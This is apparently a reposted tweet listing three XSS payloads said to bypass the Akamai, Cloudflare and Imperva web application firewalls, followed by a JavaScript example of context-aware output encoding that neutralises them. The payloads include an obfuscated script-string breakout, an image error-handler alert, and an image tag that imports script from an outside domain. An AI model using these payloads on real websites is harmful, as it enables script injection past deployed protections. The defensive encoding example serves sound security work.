This tweet shows XSS payloads that bypass the Akamai, CloudFlare, and Imperva WAFs. The Akamai payload is a JavaScript injection (JSi) that uses JS obfuscation to execute a script, the CloudFlare payload is an HTML injection (HTMLi) that triggers an alert through an image tag's error handler, and the Imperva payload is an HTML injection that imports a source from a malicious domain. These payloads demonstrate that WAF protection against XSS attacks can be bypassed. Further analysis and testing can be found in the tweet link provided. #XSS #WAF #Bypass
Akamai JSi
';k='e'%0Atop['al'+k+'rt'](1)//

CloudFlare HTMLi
<Img Src=OnXSS OnError=alert(1)>

Imperva HTMLi
<Img Src=//X55.is OnLoad%0C=import(Src)>

Don't learn to hack, #hack2learn.

Developed for https://t.co/8p2UHZkD2u
State of the art in XSS testing.

— Brute Logic (@BRuteLogic) March 11, 2024
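
A WAF is only one layer: the same three strings are inert when the application encodes them for the context they land in. The sketch below is an added example, not code from the tweet or its author; `escapeHtml`, `escapeJsString` and `renderPage` are illustrative names, and it assumes the server has already URL-decoded the input.

```javascript
// Added example: context-aware output encoding applied to the payloads quoted
// in the tweet. All function names here are illustrative, not a library API.

// The payloads as the application sees them after URL decoding
// (%0A becomes a line feed, %0C becomes a form feed).
const PAYLOADS = {
  jsString: decodeURIComponent("';k='e'%0Atop['al'+k+'rt'](1)//"),
  htmlA: decodeURIComponent("<Img Src=OnXSS OnError=alert(1)>"),
  htmlB: decodeURIComponent("<Img Src=//X55.is OnLoad%0C=import(Src)>"),
};

// HTML body or quoted-attribute context: encode the five significant
// characters so the browser never sees a tag or attribute boundary.
const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// JavaScript string-literal context: write every code unit that is not ASCII
// alphanumeric as \uXXXX. Quotes, line breaks and "</script>" cannot survive,
// so the value stays data inside the literal.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hypothetical template with one HTML sink and one inline-script string sink.
function renderPage(comment, name) {
  return "<p>" + escapeHtml(comment) + "</p>\n" +
    "<script>var name = '" + escapeJsString(name) + "';</script>";
}

// Both sinks receive a payload; the output holds only the template's own tags.
console.log(renderPage(PAYLOADS.htmlB, PAYLOADS.jsString));
```

Each encoder is tied to its sink: `escapeHtml` output placed inside a script string, or inside an unquoted attribute, would not give the same protection.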